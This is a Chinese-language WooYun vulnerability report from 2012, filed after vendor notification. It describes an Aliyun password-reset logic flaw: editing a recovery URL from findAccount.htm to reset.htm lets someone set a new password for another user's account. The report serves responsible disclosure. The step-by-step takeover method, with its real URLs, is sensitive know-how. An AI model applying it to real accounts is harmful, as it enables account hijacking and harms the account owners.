漏洞详情
披露状态:
2012-02-03: 细节已通知厂商并且等待厂商处理中
2012-02-06: 厂商已经确认,细节仅向厂商公开
2012-02-21: 细节已向核心白帽子及相关领域专家开放
2012-03-07: 细节向全体白帽子公开
2012-03-22: 细节向公众公开
简要描述:
可以通过一些逻辑获取其他账号的完全权限(我这样好不道德啊 眼看今天就周五了还给阿里同学找事。。。)
详细说明:
问题出现在忘记密码处,可以通过手机找回和邮箱找回密码两种方式获得指定帐户的新密码设置权限
漏洞证明:
进入忘记密码,填写想要获取权限帐号的ID
获得url:
https://account.aliyun.com/forget/findAccount.htm?profile=blueforyou%40aliyun.com-profile-1327128258196715需要牢记(blueforyou%40aliyun.com-profile-1327128258196715)很重要
选择邮箱找回或手机找回均可
获得url:
https://account.aliyun.com/forget/email.htm?profile=blueforyou%40aliyun.com-profile-1327128258196715&_resubmit_token_=_resubmit_token_1749728258196796
系统已将新密码设置url发送给邮箱
此时只需要将前面获取的url修改一下
将findAccount.htm?profile=blueforyou%40aliyun.com-profile-1327128258196715
修改为
reset.htm?profile=blueforyou%40aliyun.com-profile-1327128258196715
即可获得设置该用户新密码的权限
版权声明:转载请注明来源 猪哥靓@乌云
0 条评论。